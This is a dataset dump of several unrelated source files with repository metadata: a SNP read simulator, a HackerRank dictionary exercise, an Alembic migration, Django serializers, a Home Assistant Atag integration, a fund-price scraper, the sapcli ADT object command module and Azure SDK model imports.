writer = vcf.Writer(designed_fh, VCF_TEMPLATE_READER,
lineterminator='\n')
for pos, value_dict in subset.iteritems():
writer.write_record(vcf.model._Record(
'Chromosome', # CHROM
pos, # POS
None, # ID
value_dict['ref'], # REF
value_dict['alt'], # ALT
None, # QUAL
None, # FILTER
None, # INFO
None, # FORMAT
None, # sample_indexes
samples=None))
def main():
seq_record = SeqIO.read(EXCISED_GENBANK, 'genbank')
cds_features = [f for f in seq_record.features if f.type == 'CDS']
# Generate all possible SNPs to sample from. Store them in a dictionary
# keyed by position so we can easily deal with lookups and avoiding
# duplicates as needed below.
all_snps = {}
len_seq_record = len(seq_record)
# Select random positions for SNPs, respecting the distribution
# set above by the NUM_IN_CDS vs TOTAL_SNPS constants.
# NOTE: These SNP positions are pythonic. We have to update them when
# writing them out in vcf format below.
num_in_cds = 0
num_other = 0
while num_in_cds < NUM_IN_CDS or num_other < NUM_OTHER:
position = random.randint(0, len_seq_record - 1)
if position in all_snps:
continue
in_cds_feature = is_position_in_coding_feature(position, cds_features)
do_add_position = False
if in_cds_feature and num_in_cds < NUM_IN_CDS:
do_add_position = True
num_in_cds += 1
elif not in_cds_feature and num_other < NUM_OTHER:
do_add_position = True
num_other += 1
if do_add_position:
ref = seq_record.seq[position]
alt = choose_alt(ref)
all_snps[position] = {
'ref': ref,
'alt': [alt]
}
assert len(all_snps) == TOTAL_SNPS, "Didn't get all the SNPs we expected."
# Now select a subset of these SNPS to serve as designed.
designed_snps = get_subset_of_snps(all_snps, 20)
create_vcf_for_subset(designed_snps, DESIGNED_SNP_VCF)
# Now create the samples.
for sample_num in range(NUM_SAMPLES):
sample_name = SAMPLE_FASTA_ROOT + str(sample_num)
sample_record = copy.deepcopy(seq_record)
sample_record.id = sample_name
# Grab a subset of SNPs.
sample_snps = get_subset_of_snps(all_snps, 20)
# Introduce the mutations.
for position, value_dict in sample_snps.iteritems():
sample_record.seq = (
sample_record.seq[:position] +
value_dict['alt'][0] +
sample_record.seq[position + 1:])
assert len(sample_record) == len(seq_record), (
"For now we are only doing mutations.")
# Write out the sample fasta.
sample_output = sample_name + '.fa'
with open(sample_output, 'w') as out_fh:
SeqIO.write(sample_record, out_fh, 'fasta')
# Generate fake reads using simNGS.
simLibrary_fasta = sample_name + '.simLibrary.fa'
print sample_output, simLibrary_fasta
simNGS_util.run_simLibrary(sample_output, simLibrary_fasta)
# Generate reads using simNGS.
output_fq = sample_name + '.simLibrary.fq'
simNGS_util.run_paired_simNGS(simLibrary_fasta, output_fq)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
899c5f0098afd90b2bbd71e177e514e42fe973d5 | 36d4c9a57b53f5e14acb512759b49fe44d9990d8 | /hackerrank/30-days-of-code/day-8.py | d6527ddafbd6b3abc73b984d4cbb1c5fe239558e | [] | no_license | yosef8234/test | 4a280fa2b27563c055b54f2ed3dfbc7743dd9289 | 8bb58d12b2837c9f8c7b1877206a365ab9004758 | refs/heads/master | 2021-05-07T22:46:06.598921 | 2017-10-16T18:11:26 | 2017-10-16T18:11:26 | 107,286,907 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,652 | py | # # -*- coding: utf-8 -*-
# Objective
# Today, we're learning about Key-Value pair mappings using a Map or Dictionary data structure. Check out the Tutorial tab for learning materials and an instructional video!
# Task
# Given NN names and phone numbers, assemble a phone book that maps friends' names to their respective phone numbers. You will then be given an unknown number of names to query your phone book for; for each namename queried, print the associated entry from your phone book (in the form name=phoneNumbername=phoneNumber) or Not foundNot found if there is no entry for namename.
# Note: Your phone book should be a Dictionary/Map/HashMap data structure.
# Input Format
# The first line contains an integer, NN, denoting the number of entries in the phone book.
# Each of the NN subsequent lines describes an entry in the form of 22 space-separated values on a single line. The first value is a friend's namename, and the second value is an 88-digit phone numberphone number.
# After the NN lines of phone book entries, there are an unknown number of lines of queries. Each line (query) contains a namename to look up, and you must continue reading lines until there is no more input.
# Note: Names consist of lowercase English letters and are first names only.
# Constraints
# 1≤N≤1051≤N≤105
# 1≤queries≤1051≤queries≤105
# Output Format
# On a new line for each query, print Not foundNot found if the name has no corresponding entry in the phone book; otherwise, print the full namename and phoneNumberphoneNumber in the format name=phoneNumbername=phoneNumber.
# Sample Input
# 3
# sam 99912222
# tom 11122222
# harry 12299933
# sam
# edward
# harry
# Sample Output
# sam=99912222
# Not found
# harry=12299933
# Explanation
# N=3N=3
# We add the NN subsequent (Key,Value) pairs to our map so it looks like this:
# phoneBook={(sam,99912222),(tom,11122222),(harry,12299933)}phoneBook={(sam,99912222),(tom,11122222),(harry,12299933)}
# We then process each query and print Key=ValueKey=Value if the queried Key is found in the map, or Not foundNot found otherwise.
# Query 0: samsam
# Sam is one of the keys in our dictionary, so we print sam=99912222sam=99912222.
# Query 1: edwardedward
# Edward is not one of the keys in our dictionary, so we print Not foundNot found.
# Query 2: harryharry
# Harry is one of the keys in our dictionary, so we print harry=12299933harry=12299933.
n=int(input())
phonebook = dict(input().split() for _ in range(n))
for j in range(n):
name = input().strip()
if name in phonebook:
print(name + "=" + phonebook[name])
else:
print("Not found") | [
"[email protected]"
] | |
8cdd0bd9d537ad94f769df4f3a1faf52e3fb8895 | 5760ff9bca037a2e85dde8ad4d583139ab8e128a | /migrations/versions/20150624090637_3606d4a47663_update_answercomment_model.py | c4dcdcc74edfefac69c1499b71d92697c7e86322 | [] | no_license | dianchang/dianchang | 5b58cbfcf6dfcd9c2c9d55c0612a9327086b8b54 | 3414cd5af0a66facd6ec4eb787e7646d04d8c96c | refs/heads/master | 2016-08-11T11:24:49.322330 | 2015-07-30T05:18:09 | 2015-07-30T05:18:09 | 36,111,229 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 645 | py | """Update AnswerComment model.
Revision ID: 3606d4a47663
Revises: 2040a458fc8a
Create Date: 2015-06-24 09:06:37.957787
"""
# revision identifiers, used by Alembic.
revision = '3606d4a47663'
down_revision = '2040a458fc8a'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('answer_comment', sa.Column('likes_count', sa.Integer(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('answer_comment', 'likes_count')
### end Alembic commands ###
| [
"[email protected]"
] | |
2fad265d11b5850de7947324b15cf3811b053d58 | 1b25efab9fd81f1c1b9cd484a13d530759809838 | /backend/dating/api/v1/serializers.py | 94acc95fb234b127aaf19304903f55ffff0256f5 | [] | no_license | crowdbotics-apps/test-31906 | 1728e7947b6cbd52dc123310647ec523914aa1aa | 2f6841d3ac3e4d335712fd11b3ee81166eec2f47 | refs/heads/master | 2023-08-30T11:31:54.409975 | 2021-11-10T07:26:53 | 2021-11-10T07:26:53 | 426,524,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | py | from rest_framework import serializers
from dating.models import Setting, Like, UserPhoto, Match, Dislike, Inbox, Profile
class InboxSerializer(serializers.ModelSerializer):
class Meta:
model = Inbox
fields = "__all__"
class LikeSerializer(serializers.ModelSerializer):
class Meta:
model = Like
fields = "__all__"
class DislikeSerializer(serializers.ModelSerializer):
class Meta:
model = Dislike
fields = "__all__"
class UserPhotoSerializer(serializers.ModelSerializer):
class Meta:
model = UserPhoto
fields = "__all__"
class SettingSerializer(serializers.ModelSerializer):
class Meta:
model = Setting
fields = "__all__"
class ProfileSerializer(serializers.ModelSerializer):
class Meta:
model = Profile
fields = "__all__"
class MatchSerializer(serializers.ModelSerializer):
class Meta:
model = Match
fields = "__all__"
| [
"[email protected]"
] | |
b7af57cfe3b70002b84576ef64c5255279fa4d72 | bb33e6be8316f35decbb2b81badf2b6dcf7df515 | /source/res/scripts/client/gui/Scaleform/daapi/view/meta/TankmanOperationDialogMeta.py | e1d2fcccb7f4552ec5aef843bb1b493e8473c8d1 | [] | no_license | StranikS-Scan/WorldOfTanks-Decompiled | 999c9567de38c32c760ab72c21c00ea7bc20990c | d2fe9c195825ececc728e87a02983908b7ea9199 | refs/heads/1.18 | 2023-08-25T17:39:27.718097 | 2022-09-22T06:49:44 | 2022-09-22T06:49:44 | 148,696,315 | 103 | 39 | null | 2022-09-14T17:50:03 | 2018-09-13T20:49:11 | Python | UTF-8 | Python | false | false | 386 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/TankmanOperationDialogMeta.py
from gui.Scaleform.daapi.view.dialogs.SimpleDialog import SimpleDialog
class TankmanOperationDialogMeta(SimpleDialog):
def as_setDataS(self, data):
return self.flashObject.as_setData(data) if self._isDAAPIInited() else None
| [
"[email protected]"
] | |
265522a7deada1360fac4df736f45501ac5024dc | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_285/ch5_2019_06_03_01_06_29_598637.py | b4bfd46781ff35c49180a25a814cd9a7dfae311a | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | def verifica_primo(n):
if n<0:
return -1
num=3
while num<n:
if n%2==0 or n%num==0:
return False
num+=2
if n==0 or n==1:
return False
else:
return True
def maior_primo_menor_que(n):
if verifica_primo(n)== True:
return n
elif verifica_primo(n)== False:
lista=[]
for e in range(n):
if verifica_primo(n-e)==True:
return n-e
else:
return -1
| [
"[email protected]"
] | |
ecd1fe8a8b5678366ade3ae81684187a171f55f5 | 4c601eaa346e660c296e270cc2d79aea9a3721fe | /homeassistant/components/atag/__init__.py | 237a82f207a51306dfec01869827bd135973d15b | [
"Apache-2.0"
] | permissive | basnijholt/home-assistant | f55110af9ff602274c0a929c7298ef97a0ef282f | ba55b4b8338a2dc0ba3f1d750efea49d86571291 | refs/heads/dev | 2023-01-21T11:53:52.621353 | 2020-08-08T15:03:06 | 2020-08-08T15:03:06 | 220,313,680 | 5 | 1 | Apache-2.0 | 2023-01-13T06:04:49 | 2019-11-07T19:29:54 | Python | UTF-8 | Python | false | false | 4,345 | py | """The ATAG Integration."""
from datetime import timedelta
import logging
import async_timeout
from pyatag import AtagException, AtagOne
from homeassistant.components.climate import DOMAIN as CLIMATE
from homeassistant.components.sensor import DOMAIN as SENSOR
from homeassistant.components.water_heater import DOMAIN as WATER_HEATER
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, asyncio
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
_LOGGER = logging.getLogger(__name__)
DOMAIN = "atag"
PLATFORMS = [CLIMATE, WATER_HEATER, SENSOR]
async def async_setup(hass: HomeAssistant, config):
"""Set up the Atag component."""
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Set up Atag integration from a config entry."""
session = async_get_clientsession(hass)
coordinator = AtagDataUpdateCoordinator(hass, session, entry)
await coordinator.async_refresh()
if not coordinator.last_update_success:
raise ConfigEntryNotReady
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][entry.entry_id] = coordinator
if entry.unique_id is None:
hass.config_entries.async_update_entry(entry, unique_id=coordinator.atag.id)
for platform in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(entry, platform)
)
return True
class AtagDataUpdateCoordinator(DataUpdateCoordinator):
"""Define an object to hold Atag data."""
def __init__(self, hass, session, entry):
"""Initialize."""
self.atag = AtagOne(session=session, **entry.data)
super().__init__(
hass, _LOGGER, name=DOMAIN, update_interval=timedelta(seconds=30)
)
async def _async_update_data(self):
"""Update data via library."""
with async_timeout.timeout(20):
try:
if not await self.atag.update():
raise UpdateFailed("No data received")
except AtagException as error:
raise UpdateFailed(error)
return self.atag.report
async def async_unload_entry(hass, entry):
"""Unload Atag config entry."""
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(entry, component)
for component in PLATFORMS
]
)
)
if unload_ok:
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
class AtagEntity(Entity):
"""Defines a base Atag entity."""
def __init__(self, coordinator: AtagDataUpdateCoordinator, atag_id: str) -> None:
"""Initialize the Atag entity."""
self.coordinator = coordinator
self._id = atag_id
self._name = DOMAIN.title()
@property
def device_info(self) -> dict:
"""Return info for device registry."""
device = self.coordinator.atag.id
version = self.coordinator.atag.apiversion
return {
"identifiers": {(DOMAIN, device)},
"name": "Atag Thermostat",
"model": "Atag One",
"sw_version": version,
"manufacturer": "Atag",
}
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._name
@property
def should_poll(self) -> bool:
"""Return the polling requirement of the entity."""
return False
@property
def available(self):
"""Return True if entity is available."""
return self.coordinator.last_update_success
@property
def unique_id(self):
"""Return a unique ID to use for this entity."""
return f"{self.coordinator.atag.id}-{self._id}"
async def async_added_to_hass(self):
"""Connect to dispatcher listening for entity data notifications."""
self.async_on_remove(
self.coordinator.async_add_listener(self.async_write_ha_state)
)
async def async_update(self):
"""Update Atag entity."""
await self.coordinator.async_request_refresh()
| [
"[email protected]"
] | |
ef4e45fe551d5134930a7c4748f00fe58bf60c90 | 23ec2d36bc6f3706483b4d3c863ffd11b8247839 | /fundclear/models.py | f62dc5d7515d8b25124e2059be0c2a4056f9e151 | [] | no_license | slee124565/philcop | 4d6f536d2d0536d2c9110f4ea2d5b88995322cba | 592ce889f7eb59f4cf3c02a8ffa85cb505ee7add | refs/heads/master | 2021-01-11T03:58:55.028400 | 2018-01-06T15:30:45 | 2018-01-06T15:30:45 | 71,266,174 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,265 | py | import calendar
import logging
from google.appengine.ext import db
from lxml.html import document_fromstring
from lxml import etree
from datetime import date
from dateutil import parser
from dateutil.relativedelta import relativedelta
from urlsrc.models import WebContentModel
import phicops.utils
URL_TEMPLATE = 'http://announce.fundclear.com.tw/MOPSFundWeb/D02_02P.jsp?fundId={fund_id}&beginDate={begin_date}&endDate={end_date}'
DATE_INDEX = 0
VALUE_INDEX = 1
class dFundCodeModel(db.Model):
content = db.BlobProperty()
class FundClearModel(WebContentModel):
fund_name = db.StringProperty()
@classmethod
def get_fund(cls, p_fund_id, p_months=37):
if (p_fund_id == ''):
logging.warn('Invalid Parameter Value p_fund_id ' + p_fund_id)
return None
if p_months < 0:
logging.warning('Invalid Parameter Value p_month ' + str(p_months))
return None
end_date = date.today() - relativedelta(days=+1)
begin_date = end_date - relativedelta(months=p_months)
t_url = URL_TEMPLATE.format(fund_id=p_fund_id,begin_date=begin_date.strftime("%Y/%m/%d"),end_date=end_date.strftime("%Y/%m/%d"))
fund_model = FundClearModel.get_or_insert_webcontent(p_fund_id,t_url,date.today(),p_months)
if fund_model == None:
logging.warning('FundClearModel get_fund fail')
return fund_model
def get_sample_value_list(self, p_date_list):
'''
return a list of [date, nav] according to date list p_date_list
'''
nav_list = self.get_value_list()
return self.sample_value_list(p_date_list, nav_list)
def get_nav_by_date(self, p_date):
nav_list = self.get_value_list()
t_count = 0
if (nav_list[0][DATE_INDEX]).date() <= p_date:
for t_entry in nav_list:
if p_date == t_entry[DATE_INDEX].date():
logging.debug(__name__ + ': get_nav_by_date: matched entry ' + str(nav_list[t_count]))
return nav_list[t_count-1][VALUE_INDEX]
t_count += 1
logging.warning(__name__ + ': get_nav_by_date: no matched date value exist!')
return False
def get_single_html_table(self):
stk_data = str(self.content).decode('big5')
t_page = document_fromstring(stk_data)
t_tables = t_page.xpath("//table")
t_total = len(t_tables)
#logging.info('total table count: ' + str(t_total))
if t_total < 4:
#return 'TABLE ERROR'
logging.warning('Source HTML TABLE Count ERROR')
return None
html = '<table width="100%" border="1" cellpadding="1" cellspacing="1">'
html += etree.tostring(t_tables[4][0])
for t_table in t_tables[5:-1]:
for t_child in t_table:
if (t_child.tag == 'tr'):
if t_child != None:
html += etree.tostring(t_child)
html += '</table>'
return html
def get_discrete_value_list(self, p_select_day=phicops.utils.MONTH_DAY_END):
value_list = self.get_value_list()
return phicops.utils.get_discrete_date_data_list(value_list, p_select_day)
def get_value_list(self):
'''
return list of [datetime.datetime, float]
'''
dataset = []
stk_data = str(self.content).decode('big5')
t_page = document_fromstring(stk_data)
t_tables = t_page.xpath("//table")
t_total = len(t_tables)
logging.debug(__name__ + ', get_value_list: total table count: ' + str(t_total))
if t_total < 4:
logging.warning(__name__ + 'Source HTML TABLE ERROR, count ' + str(t_total))
return None
#logging.info('fund title:' + etree.tostring(t_tables[4][0][0]))
t_fund_name = t_tables[4][0][0].text
t_fund_name = t_fund_name.replace('\r\n','')
#t_fund_name = str(t_fund_name).encode('big5').splitlines()
#t_fund_name = t_fund_name[0]
logging.debug(__name__ + ', get_value_list: fund_name: ' + t_fund_name)
if (self.fund_name == None) or (self.fund_name != t_fund_name):
self.fund_name = t_fund_name
self.put()
t_count = 5
while (t_count <= (t_total-1)):
#logging.info('table child len ' + str(len(t_tables[t_count])))
if len(t_tables[t_count]) == 2:
t_date_list = [t_child.text for t_child in t_tables[t_count][0]]
t_value_list = [t_child.text for t_child in t_tables[t_count][1]]
#logging.info(t_date_list)
#logging.info(t_value_list)
#logging.info('t_count:' + str(t_count) + '/' + str(t_total))
for i in range(0,len(t_date_list)):
#logging.info('t_count:' + str(i) + '/' + str(len(t_date_list)))
#logging.info([t_date_list[i],t_value_list[i]])
if i != 0:
if (t_date_list[i].strip() != ''):
#logging.info([t_date_list[i],t_value_list[i]])
#dataset.append([calendar.timegm((parser.parse(t_date_list[i])).timetuple()) * 1000,t_value_list[i]])
dataset.append([t_date_list[i],str(t_value_list[i]).strip()])
#else:
# logging.debug('remove element ('+ str(t_count) + '#' + str(i) + '): ' + str([t_date_list[i],t_value_list[i]]))
else:
#logging.debug('skip table:\n' + etree.tostring(t_tables[t_count]))
logging.debug(__name__ + ', get_value_list: skip table ' + str(t_count))
t_count += 1
#break
t_count = 0
while (t_count < len(dataset)):
#logging.info('t_count ' + str(t_count))
(t_date,t_value) = dataset[t_count]
if (t_value == '--') or (t_value == 'N/A'):
if (t_count ==0):
#logging.debug(__name__ + ', get_value_list: removeing dataset element ' + str(dataset[t_count]))
del dataset[t_count]
continue
else:
#logging.debug('replace value with previous one, date ' + str(dataset[t_count]))
dataset[t_count][1] = dataset[t_count-1][1]
#if (t_count > 192):
# logging.info('DEBUG:' + str([t_date,t_value]))
dataset[t_count][0] = parser.parse(t_date).date()
dataset[t_count][1] = float(dataset[t_count][1])
t_count += 1
#logging.debug(dataset)
return dataset
def get_dateset(self):
'''
return Flow diagram data list
'''
dataset = []
stk_data = str(self.content).decode('big5')
t_page = document_fromstring(stk_data)
t_tables = t_page.xpath("//table")
t_total = len(t_tables)
logging.info('total table count: ' + str(t_total))
if t_total < 4:
logging.warning('Source HTML TABLE Count ERROR')
return None
#logging.info('fund title:' + etree.tostring(t_tables[4][0][0]))
t_fund_name = t_tables[4][0][0].text
t_fund_name = t_fund_name.replace('\r\n','')
#t_fund_name = str(t_fund_name).encode('big5').splitlines()
#t_fund_name = t_fund_name[0]
logging.info('fund_name: ' + t_fund_name)
if self.fund_name == None:
self.fund_name = t_fund_name
self.put()
t_count = 5
while (t_count <= (t_total-1)):
#logging.info('table child len ' + str(len(t_tables[t_count])))
if len(t_tables[t_count]) == 2:
t_date_list = [t_child.text for t_child in t_tables[t_count][0]]
t_value_list = [t_child.text for t_child in t_tables[t_count][1]]
#logging.info(t_date_list)
#logging.info(t_value_list)
#logging.info('t_count:' + str(t_count) + '/' + str(t_total))
for i in range(0,len(t_date_list)):
#logging.info('t_count:' + str(i) + '/' + str(len(t_date_list)))
#logging.info([t_date_list[i],t_value_list[i]])
if i != 0:
if (t_date_list[i].strip() != ''):
#logging.info([t_date_list[i],t_value_list[i]])
#dataset.append([calendar.timegm((parser.parse(t_date_list[i])).timetuple()) * 1000,t_value_list[i]])
dataset.append([t_date_list[i],t_value_list[i]])
else:
logging.info('remove element ('+ str(t_count) + '#' + str(i) + '): ' + str([t_date_list[i],t_value_list[i]]))
else:
logging.info('skip table:\n' + etree.tostring(t_tables[t_count]))
t_count += 1
#break
t_count = 0
while (t_count < len(dataset)):
#logging.info('t_count ' + str(t_count))
(t_date,t_value) = dataset[t_count]
if (t_value == '--') or (t_value == 'N/A'):
if (t_count ==0):
logging.warning('removeing dataset element ' + str(dataset[t_count]))
del dataset[t_count]
continue
else:
logging.warning('replace value with previous one, date ' + str(dataset[t_count]))
dataset[t_count][1] = dataset[t_count-1][1]
#if (t_count > 192):
# logging.info('DEBUG:' + str([t_date,t_value]))
dataset[t_count][0] = calendar.timegm((parser.parse(t_date)).timetuple()) * 1000
dataset[t_count][1] = float(dataset[t_count][1])
t_count += 1
logging.info(dataset)
return dataset
| [
"[email protected]"
] | |
e050beb4b72499f095479534ef15503012f24674 | 8eb8f8d88994b22db7e661f0cdf6b0ed34a172bf | /sap/cli/object.py | 595a1294a6cb05cc0b517617033f29ad4a79cc2e | [
"Apache-2.0"
] | permissive | kksat/sapcli | f85d3376979157145436f5b87ee67ecf423b3ab4 | 8a21809d5a636f126a12d2da4af864b01867e490 | refs/heads/master | 2023-04-20T14:59:31.410367 | 2021-05-05T12:54:15 | 2021-05-05T12:54:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,255 | py | """ADT Object CLI templates"""
import sys
import os
import collections
import sap.cli.core
from sap.cli.core import InvalidCommandLineError, printout
import sap.errors
import sap.adt
import sap.adt.wb
import sap.cli.wb
_NAME_INDEX = 0
_SUFFIX_INDEX = 1
def object_name_from_source_file(filesystem_path):
"""Splits the given file system path into object name and suffix.
It is expected that the object name makes the file name prefix up to
the first dot.
Example:
./src/object.abap
^^^^--- suffix (the 2nd return value)
^^^^^^-------- object name (the 1st return value)
"""
basename = os.path.basename(filesystem_path)
parts = basename.split('.', 1)
if len(parts) <= 1 or not parts[_NAME_INDEX] or not parts[_SUFFIX_INDEX]:
raise InvalidCommandLineError(f'"{basename}" does not match the pattern NAME.SUFFIX')
return parts
def write_args_to_objects(command, connection, args, metadata=None):
"""Converts parameters of the action 'write object' into a iteration of
objects with the text lines content
"""
name = args.name
text_lines = None
if name == '-':
for filepath in args.source:
if filepath == '-':
raise InvalidCommandLineError('Source file cannot be - when Object name is - too')
obj = command.instance_from_file_path(connection, filepath, args, metadata=metadata)
with open(filepath, 'r') as filesrc:
text_lines = filesrc.readlines()
yield (obj, text_lines)
elif len(args.source) == 1:
if args.source[0] == '-':
text_lines = sys.stdin.readlines()
else:
with open(args.source[0], 'r') as filesrc:
text_lines = filesrc.readlines()
yield (command.instance(connection, args.name, args, metadata=metadata), text_lines)
else:
raise InvalidCommandLineError('Source file can be a list only when Object name is -')
def printout_activation_stats(stats):
"""Prints out activation statistics"""
printout('Warnings:', stats.warnings)
printout('Errors:', stats.errors)
def printout_adt_object(prefix, obj):
"""Prints out ADT object in identifiable way"""
printout(f'{prefix}{obj.objtype.code} {obj.name}')
def activate_object_list(activator, object_enumerable, count):
"""Starts object activation and handles results"""
try:
stats = activator.activate_sequentially(object_enumerable, count)
except sap.cli.wb.StopObjectActivation as ex:
printout('Activation has stopped')
printout_activation_stats(ex.stats)
if ex.stats.active_objects:
printout('Active objects:')
for obj in ex.stats.active_objects:
printout_adt_object(' ', obj)
return 1
else:
printout('Activation has finished')
printout_activation_stats(stats)
if stats.inactive_objects:
printout('Inactive objects:')
for obj in stats.inactive_objects:
printout_adt_object(' ', obj)
return 1
return 1 if stats.errors > 0 else 0
class CommandGroupObjectTemplate(sap.cli.core.CommandGroup):
"""Template Class converting command line parameters to ADT Object methods
calls.
"""
def instance(self, connection, name, args, metadata=None):
"""Returns new instance of the ADT Object proxy class"""
raise NotImplementedError()
def instance_from_file_path(self, connection, filepath, args, metadata=None):
"""Returns new instance of the ADT Object proxy class
where the object name should be deduced from
the given file path.
"""
name, _ = object_name_from_source_file(filepath)
return self.instance(connection, name, args, metadata=metadata)
def build_new_metadata(self, connection, args):
"""Creates an instance of the ADT Object Metadata class for a new object"""
raise NotImplementedError()
def define_create(self, commands):
"""Declares the Create command with its parameters and returns
the definition.
Notice, that this command does not declare the parameter package
which should be create by descendants if necessary.
"""
create_cmd = commands.add_command(self.create_object, name='create')
create_cmd.append_argument('name')
create_cmd.append_argument('description')
create_cmd.declare_corrnr()
return create_cmd
def define_read(self, commands):
"""Declares the Read command with its parameters and returns
the definition
"""
read_cmd = commands.add_command(self.read_object_text, name='read')
read_cmd.append_argument('name')
return read_cmd
def define_write(self, commands):
"""Declares the Write command with its parameters and returns
the definition.
"""
write_cmd = commands.add_command(self.write_object_text, name='write')
write_cmd.append_argument('name',
help='an object name or - for getting it from the source file name')
write_cmd.append_argument('source', nargs='+',
help='a path or - for reading stdin; multiple allowed only when name is -')
write_cmd.append_argument('-a', '--activate', action='store_true',
default=False, help='activate after write')
write_cmd.append_argument('--ignore-errors', action='store_true',
default=False, help='Do not stop activation in case of errors')
write_cmd.append_argument('--warning-errors', action='store_true',
default=False, help='Treat Activation warnings as errors')
write_cmd.declare_corrnr()
return write_cmd
def define_activate(self, commands):
"""Declares the Activate command with its parameters and returns the
definition.
Notice that it allows multiple names on input.
"""
activate_cmd = commands.add_command(self.activate_objects, name='activate')
activate_cmd.append_argument('name', nargs='+')
activate_cmd.append_argument('--ignore-errors', action='store_true',
default=False, help='Do not stop activation in case of errors')
activate_cmd.append_argument('--warning-errors', action='store_true',
default=False, help='Treat Activation warnings as errors')
return activate_cmd
def define(self):
"""Defines the commands Create, Read, Write, and Activate and returns
the command list
"""
cls = self.__class__
if hasattr(cls, '_instance'):
return None
# pylint: disable=protected-access
cls._instance = self
commands = cls.get_commands()
self.define_create(commands)
self.define_read(commands)
self.define_write(commands)
self.define_activate(commands)
return commands
def build_new_object(self, connection, args, metadata):
"""Creates an instance of the ADT Object proxy class for a new object"""
return self.instance(connection, args.name, args, metadata=metadata)
def create_object(self, connection, args):
"""Creates the given object."""
metadata = self.build_new_metadata(connection, args)
obj = self.build_new_object(connection, args, metadata)
obj.description = args.description
obj.create(corrnr=args.corrnr)
def read_object_text(self, connection, args):
"""Retrieves the request command prints it out based on command line
configuration.
"""
obj = self.instance(connection, args.name, args)
print(obj.text)
# pylint: disable=no-self-use
def build_activator(self, args):
"""For children to customize"""
activator = sap.cli.wb.ObjectActivationWorker()
activator.continue_on_errors = args.ignore_errors
activator.warnings_as_errors = args.warning_errors
return activator
def write_object_text(self, connection, args):
"""Changes source code of the given program include"""
toactivate = collections.OrderedDict()
printout('Writing:')
for obj, text in write_args_to_objects(self, connection, args):
printout('*', str(obj))
with obj.open_editor(corrnr=args.corrnr) as editor:
editor.write(''.join(text))
toactivate[obj.name] = obj
if not args.activate:
return 0
activated_items = toactivate.items()
return activate_object_list(self.build_activator(args), activated_items, count=len(activated_items))
def activate_objects(self, connection, args):
"""Actives the given object."""
activated_items = ((name, self.instance(connection, name, args)) for name in args.name)
return activate_object_list(self.build_activator(args), activated_items, count=len(args.name))
# pylint: disable=abstract-method
class CommandGroupObjectMaster(CommandGroupObjectTemplate):
"""Commands for objects that belongs to a package.
The class CommandGroupObjectTemplate defines the command create without the
parameter packages because there are objects that belongs to a container
object (i.e. Function Module).
"""
def build_new_metadata(self, connection, args):
"""Creates an instance of the ADT Object Metadata class for a new object"""
return sap.adt.ADTCoreData(language='EN', master_language='EN',
package=args.package.upper(), responsible=connection.user.upper())
def define_create(self, commands):
"""Calls the super's define_create and inserts the parameter package
right behind the parameter description
"""
create_cmd = super().define_create(commands)
create_cmd.insert_argument(2, 'package')
return create_cmd
| [
"[email protected]"
] | |
9902776c082c92c16c89cd39d922e4b461482b88 | bad62c2b0dfad33197db55b44efeec0bab405634 | /sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_05_01_preview/models/__init__.py | b555500e3ca24979e6c5c02f7be553bf65fd61c7 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | test-repo-billy/azure-sdk-for-python | 20c5a2486456e02456de17515704cb064ff19833 | cece86a8548cb5f575e5419864d631673be0a244 | refs/heads/master | 2022-10-25T02:28:39.022559 | 2022-10-18T06:05:46 | 2022-10-18T06:05:46 | 182,325,031 | 0 | 0 | MIT | 2019-07-25T22:28:52 | 2019-04-19T20:59:15 | Python | UTF-8 | Python | false | false | 3,815 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._models_py3 import AccessReviewDecision
from ._models_py3 import AccessReviewDecisionListResult
from ._models_py3 import AccessReviewDecisionProperties
from ._models_py3 import AccessReviewDecisionTarget
from ._models_py3 import AccessReviewDefaultSettings
from ._models_py3 import AccessReviewInstance
from ._models_py3 import AccessReviewInstanceListResult
from ._models_py3 import AccessReviewReviewer
from ._models_py3 import AccessReviewScheduleDefinition
from ._models_py3 import AccessReviewScheduleDefinitionListResult
from ._models_py3 import AccessReviewScheduleDefinitionProperties
from ._models_py3 import AccessReviewScheduleSettings
from ._models_py3 import ErrorDefinition
from ._models_py3 import ErrorDefinitionProperties
from ._models_py3 import Operation
from ._models_py3 import OperationDisplay
from ._models_py3 import OperationListResult
from ._models_py3 import ServicePrincipalDecisionTarget
from ._models_py3 import UserDecisionTarget
from ._authorization_management_client_enums import AccessRecommendationType
